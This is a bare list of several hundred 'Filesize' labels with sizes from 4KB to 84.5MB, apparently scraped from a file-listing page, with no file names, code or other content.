Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
272KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
272KB
-
Filesize
492KB
-
Filesize
328KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
7.0MB
-
Filesize
128KB
-
Filesize
7.0MB
-
Filesize
128KB
-
Filesize
7.0MB
-
Filesize
344KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
132KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.9MB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
140KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
672KB
-
Filesize
412KB
-
Filesize
320KB
-
Filesize
4KB
-
Filesize
304KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
284KB
-
Filesize
584KB
-
Filesize
4KB
-
Filesize
20KB
-
Filesize
4KB
-
Filesize
728KB
-
Filesize
17.8MB
-
Filesize
4KB
-
Filesize
248KB
-
Filesize
932KB
-
Filesize
1.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
48KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
428KB
-
Filesize
464KB
-
Filesize
4KB
-
Filesize
60KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
580KB
-
Filesize
584KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
16KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
17.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
84.5MB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
28KB
-
Filesize
172KB
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
288KB
-
Filesize
52KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
7.0MB
-
Filesize
7.0MB
-
Filesize
608KB
-
Filesize
4KB
-
Filesize
592KB
-
Filesize
7.0MB
-
Filesize
7.0MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
28KB
-
Filesize
16KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
3.5MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
3.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
24KB
-
Filesize
48KB
-
Filesize
580KB
-
Filesize
584KB
-
Filesize
4KB